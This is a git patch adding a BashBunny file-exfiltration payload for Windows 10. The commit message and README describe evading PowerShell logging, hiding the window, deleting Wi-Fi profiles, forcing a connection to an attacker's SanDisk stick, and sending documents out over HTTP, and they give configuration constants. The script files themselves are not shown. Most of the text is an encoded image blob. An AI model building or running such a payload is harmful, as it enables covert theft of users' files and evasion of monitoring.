From 5d4367787f231680133e11cc7000ea4c67ffc92e Mon Sep 17 00:00:00 2001 From: TW-D <75358550+TW-D@users.noreply.github.com> Date: Tue, 21 Dec 2021 18:24:09 -0500 Subject: [PATCH] SanDisk Wireless Stick Exfiltration (#445) Uses the "SanDisk Wireless Stick" for files exfiltration. 1) Avoids "PowerShell Script Block Logging". 2) Hide "PowerShell" window. 3) Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection. 4) Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode. 5) Checks whether the Wi-Fi interface is connected to the "SanDisk" and whether the gateway can be reached, if not, automatically starts again. 6) Exfiltration of the files via the HTTP channel. --- .../README.md | 40 +++++ .../assets/SanDisk-Configuration.png | Bin 0 -> 22271 bytes .../payload.ps1 | 159 ++++++++++++++++++ .../payload.txt | 74 ++++++++ 4 files changed, 273 insertions(+) create mode 100644 payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/README.md create mode 100644 payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/assets/SanDisk-Configuration.png create mode 100644 payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.ps1 create mode 100644 payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.txt diff --git a/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/README.md b/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/README.md new file mode 100644 index 00000000..53d5b486 --- /dev/null +++ b/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/README.md @@ -0,0 +1,40 @@ +# Files Exfiltration with "SanDisk Wireless Stick" + +- Title: "SanDisk Wireless Stick" Exfiltration +- Author: TW-D +- Version: 1.0 +- Target: Microsoft Windows 10 +- Category: Exfiltration + +## Description + +Uses the "SanDisk Wireless Stick" for files exfiltration. +1) Avoids "PowerShell Script Block Logging". +2) Hide "PowerShell" window. +3) Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection. +4) Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode. +5) Checks whether the Wi-Fi interface is connected to the "SanDisk" and whether the gateway can be reached, if not, automatically starts again. +6) Exfiltration of the files via the HTTP channel. + +## Configuration + +In the web interface of the "SanDisk Wireless Stick" after update, change the following values : + +![SanDisk-Configuration.png](./assets/SanDisk-Configuration.png) + +From "payload.txt" change the values of the following constants : +```bash +######## INITIALIZATION ######## + +readonly BB_LABEL="BashBunny" + +readonly SANDISK_SSID="HAK5-EXFIL" +readonly SANDISK_PSK="MyS3cr3TP@sSw0rD" +readonly SANDISK_LOOT="loots" +readonly USER_DIRECTORY="~\\" +readonly FILE_EXTENSION="*.txt,*.pdf,*.docx" + +``` + +## Link +[SanDisk Vendor](https://www.sandisk.com/goto/connect) diff --git a/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/assets/SanDisk-Configuration.png b/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/assets/SanDisk-Configuration.png new file mode 100644 index 0000000000000000000000000000000000000000..0258e4dda576ce090526aaaeb3bc131275f4a98a GIT binary patch literal 22271 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 